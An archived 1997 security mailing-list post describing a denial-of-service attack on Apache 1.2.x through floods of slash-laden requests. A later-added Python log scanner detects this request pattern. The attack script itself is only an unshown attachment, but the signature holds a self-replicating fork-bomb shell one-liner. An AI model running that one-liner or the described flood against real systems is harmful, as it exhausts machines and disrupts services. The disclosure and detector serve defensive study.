Apache DoS attack?

From: Michał Zalewski (lcamtufat_private)
Date: Tue Dec 30 1997 - 02:07:04 PST


    [excuse me if it has been discovered before]
    
    Here's a simple exploit for Apache httpd version 1.2.x (tested on 1.2.4).
    When launched, it causes increases of the victim's load average and extreme
    slowdowns of disk operations. On my i586 Linux an annoying slowdown was
    experienced immediately (after maybe 5 seconds). After about 4 minutes
    work had turned into real hell (286?).
    
    The attached program ('beck') is a shell script. It works by sending
    excessive http requests with thousands of '/'s inside (parsed from the file
    'beck.dat'). A single request causes just a little longer thinking of
    Apache. But when requests are sent from a loop - huh, the victim
    system becomes slower and slower... At least on my machine, maybe when
    Apache is running on a lightspeed workstation this script makes no
    difference.
    
    PS. A fast connection should help... It all depends on the victim's system
    performance.
    
    _______________________________________________________________________
    Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
    =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
    
    
    [Attachment: beck.zip (application/x-zip-compressed)]
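A defensive check for the request pattern described in the message, added here as an example and not part of the original post or the attached script: it scans Apache Common Log Format lines for request targets with an abnormal number of '/' characters and reports clients that send them repeatedly. The thresholds, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S*) ?[^"]*" (\d{3}) \S+')

SLASH_LIMIT = 200   # assumed threshold: far above the depth of any ordinary URL
REPEAT_LIMIT = 3    # assumed: this many flagged requests from one client means a loop


def slash_count(target):
    """Number of '/' characters in the path part of a request target."""
    return target.split("?", 1)[0].count("/")


def flag_clients(lines, slash_limit=SLASH_LIMIT, repeat_limit=REPEAT_LIMIT):
    """Return {client: flagged_request_count} for clients that repeatedly
    send request targets containing at least slash_limit slashes."""
    hits = Counter()
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a parseable access-log line
        host, _method, target, _status = m.groups()
        if slash_count(target) >= slash_limit:
            hits[host] += 1
    return {h: n for h, n in hits.items() if n >= repeat_limit}


def sample_log():
    """Constructed log lines (documentation-range addresses), not captured traffic."""
    flood = '192.0.2.66 - - [30/Dec/1997:11:07:%02d +0100] "GET %s HTTP/1.0" 403 0'
    lines = [flood % (sec, "/" * 4000) for sec in range(5)]
    lines.append('198.51.100.7 - - [30/Dec/1997:11:07:09 +0100] '
                 '"GET /docs/a/b/index.html HTTP/1.0" 200 512')
    # A single oversized request: above the slash limit, below the repeat limit.
    lines.append('198.51.100.9 - - [30/Dec/1997:11:07:10 +0100] '
                 '"GET ' + "/" * 300 + ' HTTP/1.0" 404 0')
    return lines


if __name__ == "__main__":
    for client, count in sorted(flag_clients(sample_log()).items()):
        print(f"{client}: {count} requests with >= {SLASH_LIMIT} slashes")
```
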
    


